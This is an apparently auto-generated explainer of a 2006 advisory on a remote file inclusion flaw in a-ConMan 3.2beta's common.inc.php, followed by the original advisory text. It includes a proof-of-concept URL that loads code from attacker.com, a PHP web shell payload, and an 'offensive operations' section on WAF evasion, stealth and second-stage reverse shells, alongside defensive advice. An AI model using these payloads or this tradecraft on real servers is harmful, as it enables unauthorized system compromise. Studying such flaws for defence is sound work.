By exploitdb papers bot•November 22, 2006•
papers
a-ConMan 3.2b 'common.inc.php' Remote File Inclusion Explained
a-ConMan 3.2b 'common.inc.php' Remote File Inclusion Explained
What this paper is
This paper details a Remote File Inclusion (RFI) vulnerability found in version 3.2beta of the a-ConMan (Automated Content Management) application. The vulnerability allows an attacker to include and execute arbitrary PHP code from a remote server by manipulating the cm_basedir parameter in the common.inc.php script. This could lead to full system access.
Simple technical breakdown
The core of the vulnerability lies in how the common.inc.php script handles user input for the cm_basedir variable. This variable is intended to specify a base directory for including other application files. However, the script doesn't properly check if the provided path is safe.
An attacker can provide a URL pointing to a malicious PHP file hosted on their own server as the value for cm_basedir. When common.inc.php tries to include files using this cm_basedir, it will instead fetch and execute the attacker's PHP code from the remote URL.
Complete code and payload walkthrough
The provided paper snippet focuses on the vulnerable section of common.inc.php and the proof-of-concept (PoC) exploit.
Vulnerable Code Snippet:
<?php
include_once($cm_basedir."/ez_sql.php");
include_once($cm_basedir."/pg2ezsql.php");
// include_once($cm_basedir."/functions.php");
$ver = "3.1.1228";
...
?><?php ... ?>: This denotes a PHP code block.include_once($cm_basedir."/ez_sql.php");: This line attempts to include a file namedez_sql.php. The path to this file is constructed by concatenating the value of the$cm_basedirvariable with the string"/ez_sql.php". Theinclude_onceconstruct ensures that the file is included only once, even if it's referenced multiple times.include_once($cm_basedir."/pg2ezsql.php");: Similar to the above, this line attempts to includepg2ezsql.php, again using the value of$cm_basedir.// include_once($cm_basedir."/functions.php");: This line is commented out. If it were active, it would attempt to includefunctions.phpusing the$cm_basedirvariable.$ver = "3.1.1228";: This line assigns a version string to the$vervariable. It's not directly part of the vulnerability but provides context about the application version.
Proof Of Concept (PoC) Exploit URL:
http://target.com/[a-conman_path]/php.incs/common.inc.php?cm_basedir=http://attacker.com/inject.txt?http://target.com/: The base URL of the vulnerable a-ConMan application.[a-conman_path]/php.incs/common.inc.php: This is the path to the vulnerable script. Thephp.incsdirectory is wherecommon.inc.phpresides.?cm_basedir=http://attacker.com/inject.txt?: This is the crucial part.cm_basedir=: This specifies the parameter being passed tocommon.inc.php.http://attacker.com/inject.txt: This is the attacker-controlled URL. The attacker would host a file namedinject.txt(or any other name) on their server (attacker.com). This file would contain malicious PHP code.?: The trailing question mark is often used to terminate the query string. In some PHP configurations or when dealing with URL parsing, it can help ensure that the inclusion mechanism correctly interprets the provided URL.
How it works:
- The attacker sends the PoC URL to the target server.
- The
common.inc.phpscript receives the request. - The
cm_basedirparameter is set tohttp://attacker.com/inject.txt?. - The script then executes
include_once($cm_basedir."/ez_sql.php");. - This effectively becomes
include_once("http://attacker.com/inject.txt?/ez_sql.php");. - PHP's
includeandinclude_oncefunctions, when given a URL (starting withhttp://orhttps://), will attempt to fetch the content from that URL. - If the web server is configured to allow URL includes (which was common in older PHP versions), it will download
inject.txtfromattacker.com. - If
inject.txtcontains valid PHP code (e.g.,<?php phpinfo(); ?>), that code will be executed on the target server.
Payload:
The "payload" in this context is the content of the file hosted on the attacker's server (e.g., inject.txt). A simple payload to test the vulnerability would be:
<?php phpinfo(); ?>A more malicious payload could be:
<?php system($_GET['cmd']); ?>This would allow the attacker to execute arbitrary system commands by appending a cmd parameter to the exploit URL, like: http://target.com/[a-conman_path]/php.incs/common.inc.php?cm_basedir=http://attacker.com/inject.txt?&cmd=ls -l.
Code Fragment/Block -> Practical Purpose Mapping:
include_once($cm_basedir."/ez_sql.php");-> Attempts to include a core a-ConMan library file, but the path is controlled by the attacker.include_once($cm_basedir."/pg2ezsql.php");-> Another core library inclusion, also vulnerable to path manipulation.cm_basedir=http://attacker.com/inject.txt?-> The attacker-controlled input that hijacks theinclude_oncemechanism.http://attacker.com/inject.txt-> The remote URL hosting the malicious PHP code.<?php phpinfo(); ?>(ininject.txt) -> A basic payload to confirm RFI by displaying PHP configuration.<?php system($_GET['cmd']); ?>(ininject.txt) -> A more advanced payload to execute arbitrary system commands.
Practical details for offensive operations teams
- Required Access Level: Unauthenticated remote access. The vulnerability is exploitable via a web browser.
- Lab Preconditions:
- A target web server running a vulnerable version of a-ConMan (3.2beta or earlier).
- The vulnerable script
common.inc.phpmust be accessible. - The target web server must be configured to allow
allow_url_fopenandallow_url_includein its PHP configuration. These were often enabled by default in older PHP versions but are now typically disabled for security reasons. - An attacker-controlled web server to host the malicious PHP payload. This server must be accessible from the target.
- Tooling Assumptions:
- A web browser for manual testing or scripting.
- A web server (e.g., Apache, Nginx) to host the payload.
- A text editor to create the payload file.
- Potentially, a vulnerability scanner that can identify RFI vulnerabilities.
- Execution Pitfalls:
allow_url_fopen/allow_url_includedisabled: If these PHP directives are disabled on the target server, the RFI will not work. This is the most common failure point.- Web Application Firewalls (WAFs): Modern WAFs may detect and block requests containing suspicious URLs or payloads.
- URL Encoding: The attacker might need to URL-encode parts of the payload or the entire URL, depending on the target environment and any filtering in place.
- Path Restrictions: If the application path is not standard, the attacker needs to correctly identify
[a-conman_path]. - Payload Execution Context: The executed PHP code runs with the privileges of the web server process (e.g.,
www-data,apache). This limits what the attacker can do directly without further privilege escalation. - Trailing Slash/Query String Issues: The exact way PHP parses URLs can sometimes be tricky. The trailing
?in the PoC is an example of this. Experimentation might be needed.
- Tradecraft Considerations:
- Reconnaissance: Confirm the version of a-ConMan if possible. Check PHP configuration (
phpinfo()page if accessible) forallow_url_fopenandallow_url_include. - Payload Staging: For more complex attacks, the initial RFI can be used to download and execute a more sophisticated second-stage payload (e.g., a reverse shell).
- Obfuscation: If the WAF is aggressive, obfuscating the payload or the URL might be necessary.
- Stealth: Avoid noisy payloads like
phpinfo()during a stealthy engagement. Use commands that are less likely to be logged or trigger alerts.
- Reconnaissance: Confirm the version of a-ConMan if possible. Check PHP configuration (
Where this was used and when
This vulnerability was discovered and published in November 2006. At that time, web applications, especially those built on PHP, were common targets. Applications like a-ConMan, which were often self-hosted, represented a significant attack surface. RFI vulnerabilities were prevalent in the mid-2000s due to less mature development practices and default PHP configurations that favored functionality over security.
It's highly probable that this specific vulnerability, or similar RFI flaws in other PHP applications, were exploited in the wild by various threat actors for unauthorized access and system compromise. The ease of exploitation made it a popular technique.
Defensive lessons for modern teams
- Input Validation is Paramount: Always validate and sanitize all user-supplied input, especially when it's used in file operations, database queries, or external commands. Never trust user input.
- Disable
allow_url_fopenandallow_url_include: These PHP directives are a major security risk and should be disabled in production environments unless absolutely necessary for a specific, well-understood feature. Modern PHP versions often have these disabled by default. - Use Relative Paths or Whitelisting: When including files, prefer relative paths within the application's known directories. If external includes are absolutely required, implement strict whitelisting of allowed URLs.
- Keep Software Updated: Regularly update all web applications and their underlying frameworks and dependencies to patch known vulnerabilities.
- Web Application Firewalls (WAFs): Deploy and properly configure WAFs to detect and block common attack patterns, including RFI attempts.
- Secure PHP Configuration: Review and harden the
php.iniconfiguration, disabling dangerous functions and directives. - Code Auditing: Regularly audit application code for common vulnerabilities like RFI, SQL injection, and XSS.
ASCII visual (if applicable)
This vulnerability can be visualized as a redirection of the application's intended file inclusion mechanism.
+---------------------+ +-----------------------+ +--------------------+
| Attacker's Server | --> | Target Web Server | --> | Vulnerable a-ConMan|
| (e.g., attacker.com)| | (e.g., target.com) | | (common.inc.php) |
| | | | | |
| - Malicious PHP | | - Receives Request | | - Processes |
| File (inject.txt) | | with cm_basedir=URL | | cm_basedir param |
| | | | | |
+---------------------| +-----------+-----------+ +---------+----------+
| | |
| | | (include_once)
| | |
| v v
| +-----------------------+ +--------------------+
| | PHP Interpreter | --> | Executes Malicious |
| | (on target server) | | Code from Attacker |
| | | | Server |
+-----> Fetches URL content | +--------------------+
| (inject.txt) |
+-----------------------+Source references
- Paper ID: 2831
- Paper Title: a-ConMan 3.2b - 'common.inc.php' Remote File Inclusion
- Author: Matdhule
- Published: 2006-11-22
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/2831
- Raw URL: https://www.exploit-db.com/raw/2831
Original Exploit-DB Content (Verbatim)
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/ .OR.ID
ECHO_ADV_61$2006
------------------------------------------------------------------------------
[ECHO_ADV_61$2006] a-ConMan <= v3.2beta Remote File Inclusion
------------------------------------------------------------------------------
Author : Ahmad Maulana a.k.a Matdhule
Date Found : November, 22nd 2006
Location : Indonesia, Jakarta
web : http://advisories.echo.or.id/adv/adv61-matdhule-2006.txt
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
a-ConMan (Automated Content Management)
Application : a-ConMan (Automated Content Management)
version : 3.2beta
URL : http://sourceforge.net/projects/a-conman
a-ConMan is a flexible database solution built to categorize and manage your image and video content. Giving you the ability to automate the building and updating for any type of content specific website within seconds. Utilizing one of the most advanced
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~
I found vulnerability at script common.inc.php
-----------------------common.inc.php----------------------
....
<?php
include_once($cm_basedir."/ez_sql.php");
include_once($cm_basedir."/pg2ezsql.php");
// include_once($cm_basedir."/functions.php");
$ver = "3.1.1228";
...
----------------------------------------------------------
Input passed to the "cm_basedir" parameter in common.inc.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.
Proof Of Concept:
~~~~~~~~~~~~~~~
http://target.com/[a-conman_path]/php.incs/common.inc.php?cm_basedir=http://attacker.com/inject.txt?
Solution:
~~~~~~~
- Sanitize variable $cm_basedir on common.inc.php.
---------------------------------------------------------------------------
Shoutz:
~~~
~ solpot a.k.a chris, J4mbi H4ck3r thx for the hacking lesson :)
~ y3dips,the_day,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous,str0ke
~ bius, lapets, BlueSpy, NpR, h4ntu, thama, Fungky
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com
~ Solpotcrew Comunity (#nyubicrew @ allindo.net), #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~~
matdhule[at]gmail[dot]com
-------------------------------- [ EOF ]----------------------------------
# milw0rm.com [2006-11-22]